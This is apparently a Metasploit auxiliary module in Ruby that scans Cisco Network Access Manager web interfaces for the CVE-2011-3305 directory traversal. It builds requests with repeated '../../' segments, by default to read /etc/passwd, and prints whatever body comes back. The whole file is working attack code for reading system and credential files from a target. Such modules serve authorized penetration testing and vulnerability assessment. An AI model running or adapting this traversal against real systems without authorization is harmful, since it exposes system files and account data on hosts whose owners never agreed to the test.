Path: blob/master/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
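##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that checks a Cisco NAC Manager web interface for the
# directory traversal tracked as CVE-2011-3305 / OSVDB 76080.
#
# Every probe is a GET to /admin/file_download whose `tag` query parameter
# carries one or more '../../' segments followed by the FILE option. That
# request shape is what an HTTP access log recording query strings would show.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its options: RPORT (443, with SSL on by
  # default), FILE (the path appended after the traversal segments) and MAXDIRS
  # (the upper bound on how many traversal levels are tried).
  def initialize
    super(
      'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
      'Description' => %q{
        This module tests whether a directory traversal vulnerability is present
        in versions of Cisco Network Access Manager 4.8.x You may wish to change
        FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
      },
      'References' => [
        [ 'CVE', '2011-3305' ],
        [ 'OSVDB', '76080']
      ],
      'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SSL' => true
      }
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
        OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
      ]
    )
  end

  # Probes one host. The scanner mixin supplies `ip`; the body addresses the
  # target through rhost/rport instead.
  #
  # A GET to /admin is sent first, and the traversal attempts only run when
  # that request gets a response. Levels 1..MAXDIRS are then tried in order,
  # stopping at the first HTTP 200.
  #
  # NOTE(review): a 200 status is treated as "may have succeeded" only. The
  # body is printed without checking that it is the requested file, so a
  # login page or soft error page answering 200 would be reported the same
  # way. The operator has to read the output to confirm.
  def run_host(ip)
    traversal = '../../'
    part1 = '/admin/file_download?tag='
    part2 = '&fileType=snapshot'

    print_status("Attempting to connect to #{rhost}:#{rport}")
    res = send_request_raw({ 'method' => 'GET', 'uri' => '/admin' }, 25)

    # Without a response from the initial request there is nothing to test.
    # Say so in verbose mode instead of returning silently.
    unless res
      vprint_error("No response from #{rhost}:#{rport}, skipping")
      return
    end

    1.upto(datastore['MAXDIRS']) do |level|
      uri = part1 + (traversal * level) + datastore['FILE'] + part2
      res = send_request_raw({ 'method' => 'GET', 'uri' => uri }, 25)

      if res.nil?
        # A request that gets no response is distinct from an HTTP error status.
        vprint_error("Attempt ##{level} got no response from #{rhost}:#{rport}")
      elsif res.code == 200
        print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
        break
      elsif res.code
        print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
      end
    end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE => e
    # Connection-level failures used to be swallowed with no trace. They are
    # still non-fatal for the scan, but verbose mode now shows why the host
    # produced no result.
    vprint_error("#{rhost}:#{rport} - #{e.class}: #{e.message}")
  end
end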